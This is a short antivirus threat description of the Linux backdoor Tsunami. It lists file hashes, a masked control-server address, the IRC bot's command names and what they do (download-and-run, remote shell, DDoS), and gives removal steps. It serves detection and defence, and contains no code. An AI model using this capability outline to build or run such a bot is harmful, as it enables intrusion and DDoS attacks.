Backdoor.Linux.Tsunami.gen

Technical Details

This backdoor provides an attacker with remote access to an infected machine. It is a Linux application (ELF file). It is 29 318 bytes in size.

MD5: 1610768b1524e24d840ae25964d02c8e

SHA1: 8766ba34a15e56850feab896b37a987077b0d2a4

Payload

The backdoor provides networking with the following hosts:

80.***.54.131

In response, the backdoor receives the following commands from an attacker:

TSUNAMI
UNKNOWN
NICK
SERVER
GETSPOOFS
SPOOFS
DISABLE
ENABLE
KILL
VERSION
KILLALL
HELP
IRC
SH
PAN
MOVE
UDP
GET

Depending on the command, the backdoor can perform the following actions:

  • downloads files from the Internet to save them with the specified name and run (GET);
  • executes shell commands (SH);
  • communicates via HTTP and IRC channels (SERVER, NICK, IRC, VERSION, HELP, MOVE, KILL);
  • organizes DDoS attacks on the specified IP address (TSUNAMI, GETSPOOFS, SPOOFS, DISABLE, ENABLE, PAN, UDP, KILLALL).

Thus, the backdoor provides an attacker with full access to an infected computer, which becomes a part of a botnet.

Removal Instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

  1. Delete the original malicious file (the location on the infected computer will depend on how the program originally penetrated the victim machine).
  2. Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases (download a trial version).